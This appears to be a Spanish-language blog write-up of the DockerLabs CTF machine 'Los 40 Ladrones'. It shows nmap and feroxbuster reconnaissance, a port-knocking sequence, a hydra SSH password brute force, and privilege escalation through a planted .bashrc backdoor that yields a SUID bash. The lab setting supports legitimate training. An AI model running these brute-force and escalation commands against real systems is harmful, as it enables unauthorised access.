Post

Los 40 Ladrones , DockerLabs

portada

En este reto de DockerLabs practicamos.

  • Scan de puertos
  • Brute Force
  • Port knocking

Herramientas y recursos

  • nmap
  • feroxbuster
  • knocking

Reconocimiento y enumeracion

Lo primero como siempre le tiramos un nmap con los parámetros de costumbre.

1
sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -Pn -oX losladrones  172.18.0.2

reporte

En este caso y con el comando habitual solo detecta el puerto 80 http abierto, así que procedemos a revisar la web pese a lo que aparenta.

web

Lanzamos un poco de fuzzing

1
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 400 -u http://172.17.0.2 

No encuentra ningún directorio pasamos a buscar ficheros.

Busquemos ficheros.

1
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 400 -x php,txt,jpg -u http://172.17.0.2

qdefense

Con la búsqueda de ficheros hemos tenido mas éxito y no encentra un txt , miremos lo para ver que tenemos.

txtqdefense

Como vemos tenemos un posible usuario toctoc y si tiene trastorno obsesivo compulsivo pues se volvió loco buscando como entrar.

Es obvio que algo se nos paso si nos están dando un usuario y lo que parecen ser puertos , deberemos de localizar donde esta ssh y en que estado esta el puerto.

1
nmap --top-ports 25T -n -Pn 172.17.0.2 

Decido ejecutarlo así por si aparte de estar filtrado lo hubiesen también cambiado de puerto cosa no descabellada. En este caso parece estar en el 22.

nmap

Sin mas lanzamos un golpeteo contra los puertos que indica el fichero qdefense.txt

1
knock 172.17.0.2 7000 8000 9000 -v 

knock

Como vemos en la imagen después del golpeteo ya figura el estado de abierto y podemos empezar con la fuerza bruta y el usuario toctoc.

1
hydra -l toctoc -P /home/quino/rockyou.txt ssh://172.17.0.2 -t 64 -VI 

hydra

Nos logeamos con el user toctoc y empezamos a buscar como escalar privilegios.

Lo primero que ejecuto es sudo -l

sudol

Tenemos suerte revisamos pero algo no cuadra y hay que seguir buscando.

Posteriormente encontramos.

backdoor

Viendo esas instrucciones halladas en una funcioncita en bashrc nos trasladamos a la maquina atacante y knocking de nuevo.

copibash

Retornamos a la victima y buscamos que ha sucedido y ahora tendremos el bash con permisos suid.

Escalada final

opt

Asi que …………

1
sudo /opt/bash -p

root

Muchas gracias por leer ayuda y comparte conocimiento.

This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.